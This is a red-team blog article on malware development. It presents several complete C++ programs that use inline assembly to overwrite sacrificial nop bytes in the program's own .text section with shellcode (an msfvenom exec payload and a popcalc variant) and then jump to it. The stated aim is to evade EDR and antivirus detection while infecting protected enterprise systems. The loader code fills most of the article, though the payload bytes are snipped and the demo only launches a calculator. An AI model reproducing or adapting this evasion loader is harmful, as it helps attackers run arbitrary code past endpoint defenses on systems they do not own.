TTPs: BadAsm

In this writeup we use the capabilities of inline assembly to overwrite part of our program's .text section and achieve non-standard payload self-injection and execution

Part One: Introduction

If you're at all familiar with malware development, you know that most malware delivers payloads from remote servers via some implementation of memory allocation -> memory writing -> execution of code. As discussed in my JmpNoCall article, this frequently results in API calls returning to unbacked RX or RWX sections of memory. Because this is almost always anomalous/malicious behavior, advanced EDR/AV technologies flag/block this behavior thereby rendering most primitive implant implementations useless.

In this article I will propose a technique that overwrites the standard .text section of our implant at runtime in order to execute code from a "known" area of memory. We’re going to use inline assembly to get some addresses, overwrite sacrificial instructions, and ultimately execute some malicious code in a modern EDR environment that blocks typical memory execution.

Note: A lot of what we're doing here is going to be very memory unsafe so you might have to tweak the assembly and payloads used in this writeup to achieve successful execution

Part Two: Getting Started

We can use the following code to get started:

//x86_64-w64-mingw32-g++.exe main.cpp -o bad_asm.exe -masm=intel -Oz

#include <stdio.h>
#include <Windows.h>

asm("WriteHere:;"				// Beginning of our section of memory
	"nop;"					// sacrificial bytes we're going to overwrite
	"jmp ReturnHere;");			// return to main()

int main(void){
	DWORD oldProtect = PAGE_EXECUTE;
	LPVOID overwriteAddress = NULL;
	
	// predetermined MAX value of payload size
	SIZE_T payloadSize = 0x1;
	
	// payload
	BYTE payload[] = {0xcc};
	
	// get address of sacrificial bytes
	asm("lea %0, [rip+WriteHere];"
	: "=r" (overwriteAddress)
	:
	:
	);
	
	// we can skip VirtualAlloc because we have pre-allocated the memory above
	VirtualProtect(overwriteAddress, payloadSize, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	// overwrite our sacrificial instructions
	RtlMoveMemory(overwriteAddress, payload, payloadSize);
	
	// jmp to our payload
	asm("jmp WriteHere;");
	
	// return to our implant
	asm("ReturnHere:;");
	printf("Successful execution!\n");
	
	return 0;
}

Now that we have a pretty clear idea of what we want to happen, lets compile the code and run inside of x64dbg.

We see that we successfully hit an interrupt instruction

And if we follow that instruction in our memory map, we can see that our payload is in the .text section of memory

We can even see that if we execute our payload to termination, it returns to main and continues execution like we expect.

Part Three: A proper payload

In order for this to work, we'll have to pre-allocate a larger sacrificial area in our .text section. We can do that with some command line python code:

python -c "print(',0x90'*500)"

If we want to use an msfvenom payload, our code should look something like this:

//x86_64-w64-mingw32-g++.exe main.cpp -o bad_asm.exe -masm=intel -Oz
#include <stdio.h>
#include <Windows.h>

asm("WriteHere:;");			// Beginning of our section of memory
					// sacrificial bytes we're going to overwrite, python -c "print(',0x90'*500)"
asm(".byte [...snip...]");
asm("jmp ReturnHere;");			// return to main()

int main(void){
	DWORD oldProtect = PAGE_EXECUTE;
	LPVOID overwriteAddress = NULL;
	
	// payload : 332 bytes
	// msfvenom -p windows/x64/exec EXITFUNC=none CMD=calc.exe -f c -a x64
	BYTE payload[] ={[...snip...]};
	
	// predetermined MAX value of payload size, minus one to avoid copying a null-byte
	SIZE_T payloadSize = sizeof(payload);
	
	// get address of sacrificial bytes
	asm("lea %0, [rip+WriteHere];"
	: "=r" (overwriteAddress)
	:
	:
	);
	
	// we can skip VirtualAlloc because we have pre-allocated the memory above
	VirtualProtect(overwriteAddress, payloadSize, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	// overwrite our sacrificial instructions
	memcpy(overwriteAddress, payload, payloadSize);
	
	
	// jmp to our payload
	asm("jmp WriteHere;");
	
	
	return 0;
}

And we get payload execution!

However, because we used an encoder our payload will need RWX permission to execute, additionally msfvenom payloads have a bad habit of not exiting nicely and allowing for implant recovery without low level modifications.

An alternative is to use a slight variant of @boku's popcalc payload to be able to better achieve OPSEC and recoverable exectution. We'll skip the discussion of that implementation, but the code is available on my github.

Part Four: Better execution

Our better solution looks something like this:

//x86_64-w64-mingw32-g++.exe main.cpp -o bad_asm.exe -masm=intel -O0
#include <stdio.h>
#include <Windows.h>

asm("WriteHere:;");			// Beginning of our section of memory
					// sacrificial bytes we're going to overwrite, python -c "print(',0x90'*500)"
asm(".byte [...snip...]");
asm("jmp ReturnHere;");			// return to main()

int main(void){
	DWORD oldProtect = PAGE_EXECUTE;
	LPVOID overwriteAddress = NULL;
	
	// payload : 332 bytes
	// boku's popcalc, with an extra "pop rax" to make it work on my machine
	// https://github.com/boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode/blob/main/win-x64-DynamicKernelWinExecCalc.asm
	BYTE payload[] = [...snip...]";
	
	// predetermined MAX value of payload size
	SIZE_T payloadSize = sizeof(payload)-1;
	
	// get address of sacrificial bytes
	asm("lea %0, [rip+WriteHere];"
	: "=r" (overwriteAddress)
	:
	:
	);
	
	// we can skip VirtualAlloc because we have pre-allocated the memory above
	VirtualProtect(overwriteAddress, payloadSize, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	// overwrite our sacrificial instructions
	memcpy(overwriteAddress, payload, payloadSize);
	
	// restore permissions
	VirtualProtect(overwriteAddress, payloadSize, oldProtect, &oldProtect);
	
	// jmp to our payload
	asm("jmp WriteHere;");
	
	// return to our implant
	asm("ReturnHere:;");
	printf("Successful execution!\n");
	
	return 0;
}

Part Five: ???

[Intentionally left blank]

Part Six: Profit

Part Six: Conclusion

EDRs are very complex, and this is only one aspect of EDR detection that must be overcome in order to successfully infect protected enterprise level systems. But my testing showed that this technique avoided threat detection on some vendors, though achieving code execution proper is another matter. We did not implement any unhooking or more complex bypass techniques in this article which is bound to leave us very vulnerable to detection.

This is the second article that I've written on the use of inline assembly in order to bypass protections. The granularity of control that can be achieved with inline assembly is a huge capability that is largely unexplored on x64 systems. This is probably due to the fact that Visual Studio does not support inline assembly for x64 or ARM architectures. In any case, inline assembly is a powerful capability that requires further research.

References

64bit Applications and Inline AssemblyStack Overflow

x64win-DynamicNoNull-WinExec-PopCalc-Shellcode/win-x64-DynamicKernelWinExecCalc.asm at main · boku7/x64win-DynamicNoNull-WinExec-PopCalc-ShellcodeGitHub

Red_Team_Code_Snippets/Cpp/badAsm at main · 0xTriboulet/Red_Team_Code_SnippetsGitHub

PreviousTTPs: JmpNoCall NextTTPs: BadStrings

Last updated 1 year ago